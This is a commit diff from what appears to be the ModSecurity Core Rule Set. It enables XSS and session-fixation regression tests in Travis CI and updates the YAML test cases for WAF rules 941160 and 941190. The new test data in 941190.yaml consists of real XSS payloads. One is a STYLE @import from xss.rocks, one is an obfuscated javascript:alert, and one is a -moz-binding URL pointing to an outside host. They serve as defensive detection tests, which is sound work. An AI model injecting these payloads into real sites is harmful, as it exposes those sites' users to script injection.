Updating XSS rules, travis, and updating 920430 because it'll never fire in phase 2

csanders-git · lifeforms · commit 5206485c18e9 · 2017-09-15T22:09:20.000+02:00
(cherry picked from commit 401561e)
diff --git a/.travis.yml b/.travis.yml
@@ -17,8 +17,9 @@ script:
   - py.test -vs util/regression-tests/CRS_Tests.py --ruledir=util/regression-tests/tests/REQUEST-913-SCANNER-DETECTION
   - py.test -vs util/regression-tests/CRS_Tests.py --ruledir=util/regression-tests/tests/REQUEST-921-PROTOCOL-ATTACK
   - py.test -vs util/regression-tests/CRS_Tests.py --ruledir=util/regression-tests/tests/REQUEST-930-APPLICATION-ATTACK-LFI
+  - py.test -vs util/regression-tests/CRS_Tests.py --ruledir=util/regression-tests/tests/REQUEST-941-APPLICATION-ATTACK-XSS
   - py.test -vs util/regression-tests/CRS_Tests.py --ruledir=util/regression-tests/tests/REQUEST-942-APPLICATION-ATTACK-SQLI
-
+  - py.test -vs util/regression-tests/CRS_Tests.py --ruledir=util/regression-tests/tests/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION
 # safelist
 branches:
   only:
diff --git a/util/regression-tests/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941160.yaml b/util/regression-tests/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941160.yaml
@@ -6,7 +6,7 @@
     description: "Tests to trigger, or not trigger 941160"
   tests: 
     - 
-      test_title: 941160-1
+      test_title: 941160-1FN
       desc: XSS in XML Test as described in http://www.client9.com/article/five-interesting-injection-attacks/
       stages:
       - 
@@ -38,4 +38,4 @@
           output:
             log_contains: id "941160"              
             
-            
+            
diff --git a/util/regression-tests/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941190.yaml b/util/regression-tests/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941190.yaml
@@ -1,6 +1,6 @@
 ---
   meta: 
-    author: "zmallen"
+    author: "csanders-git"
     enabled: true
     name: "941190.yaml"
     description: "Tests to trigger, or not trigger 941190"
@@ -19,7 +19,7 @@
             headers:
               User-Agent: ModSecurity CRS 3 Tests
               Host: localhost
-            data: '941190-1=window.location'
+            data: '941190-1=<STYLE>@import'http://xss.rocks/xss.css';</STYLE>'
           output:
             log_contains: id "941190"
     - 
@@ -36,7 +36,7 @@
             headers:
               User-Agent: ModSecurity CRS 3 Tests
               Host: localhost
-            data: 'document.cookie=941190-2'
+            data: 'x=<STYLE>@im\\port'\\ja\vasc\\ript:alert('XSS')';</STYLE>'
           output:
             log_contains: id "941190"
     - 
@@ -53,6 +53,6 @@
             headers:
               User-Agent: ModSecurity CRS 3 Tests
               Host: localhost
-              Cookie: 'window.location=941190-3'
+              Cookie: '<STYLE>BODY{-moz-binding:url("http://xss.rocks/xssmoz.xml#xss")}</STYLE>'
           output:
             log_contains: id "941190"

Original file line number	Diff line number	Diff line change
`@@ -6,7 +6,7 @@`
`6`	`6`	`description: "Tests to trigger, or not trigger 941160"`
`7`	`7`	`tests:`
`8`	`8`	`-`
`9`		`- test_title: 941160-1`
	`9`	`+ test_title: 941160-1FN`
`10`	`10`	`desc: XSS in XML Test as described in http://www.client9.com/article/five-interesting-injection-attacks/`
`11`	`11`	`stages:`
`12`	`12`	`-`
`@@ -38,4 +38,4 @@`
`38`	`38`	`output:`
`39`	`39`	`log_contains: id "941160"`
`40`	`40`
`41`		`-`
	`41`	`+`